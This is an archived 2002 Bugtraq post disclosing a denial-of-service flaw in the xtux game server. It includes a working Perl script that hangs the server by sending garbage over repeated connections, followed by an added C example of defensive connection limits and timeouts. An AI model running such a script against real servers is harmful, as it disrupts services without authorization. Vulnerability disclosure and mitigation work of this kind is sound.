From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Subject: xtux server DoS.
Date: Sat, 09 Mar 2002 15:53:32 -0700
After telnetting into an xtux server a few times and typing random stuff I
noticed the server stopped responding. Xtux is a really cool game for Linux,
you should try it. It also took up 70% CPU before I killed it. Then I coded
a small Perl script to test this, and it worked every time I tested. I emailed the
author of xtux a few days ago, haven't heard anything yet. I figure the
problems that need to be addressed are:

the number of connections from one host. - currently unlimited.
the total number of connections. - currently unlimited.
some sort of timeout for the server - currently the client handles timeouts
but server allows clients to stay connected without doing anything forever.
a fix for when users send garbage (don't make the connection correctly) to
the server and it becomes unresponsive.

For now I would just set tight firewall rules when you run the xtux server,
you should know who you are playing with anyways.

Here is that Perl script I used to test:
#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponsive and takes up lots of CPU.
use IO::Socket;
for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
    print "Connecting to $ARGV[0] port $ARGV[1]\n";
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort =>
        $ARGV[1], Proto => 'tcp' ) or print "\ncouldn't connect\n\n";
    sleep 3;
    print $sock "garbage data\n\n";
}
exit;
http://b0iler.advknowledge.net
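
Added example, not part of the original post and not xtux code: one way a server's main loop could enforce the four fixes the post lists (per-host cap, total cap, server-side timeout, dropping clients that send garbage). The limits, the function names and the `valid` flag, which stands for the result of the server's own message parser, are all assumptions.

```c
/* Added example: connection admission and reaping for a small game server.
   All limits and names are assumptions, not taken from xtux. */
#include <stdint.h>
#include <time.h>

#define MAX_TOTAL      16  /* assumed cap on all connections */
#define MAX_PER_HOST    2  /* assumed cap per source address */
#define HANDSHAKE_SECS  5  /* assumed deadline for the first valid message */
#define IDLE_SECS      60  /* assumed limit on silence after joining */

struct conn { int used, joined; uint32_t addr; time_t opened, last_rx; };
static struct conn table[MAX_TOTAL];

/* Call after accept(). Returns a slot index, or -1 if the caller must
   close the new socket because a cap has been reached. */
int conn_admit(uint32_t addr, time_t now) {
    int free_slot = -1, same_host = 0;
    for (int i = 0; i < MAX_TOTAL; i++) {
        if (!table[i].used) { if (free_slot < 0) free_slot = i; continue; }
        if (table[i].addr == addr) same_host++;
    }
    if (free_slot < 0 || same_host >= MAX_PER_HOST) return -1;
    table[free_slot] = (struct conn){1, 0, addr, now, now};
    return free_slot;
}

/* Call when bytes arrive; valid is the parser's verdict on the message.
   Returns 0 to keep the client, -1 when the caller must close the socket. */
int conn_on_data(int slot, int valid, time_t now) {
    struct conn *c = &table[slot];
    if (!valid) { c->used = 0; return -1; }  /* garbage: drop, do not retry */
    c->joined = 1;
    c->last_rx = now;
    return 0;
}

/* Call once per main-loop tick. Frees slots that never completed a
   handshake in time or have gone silent; returns how many were freed. */
int conn_reap(time_t now) {
    int reaped = 0;
    for (int i = 0; i < MAX_TOTAL; i++) {
        struct conn *c = &table[i];
        if (!c->used) continue;
        int late = !c->joined && now - c->opened > HANDSHAKE_SECS;
        int idle = now - c->last_rx > IDLE_SECS;
        if (late || idle) { c->used = 0; reaped++; }
    }
    return reaped;
}
```

The caller still owns the sockets: every -1 return and every reaped slot must be followed by close() on the matching descriptor.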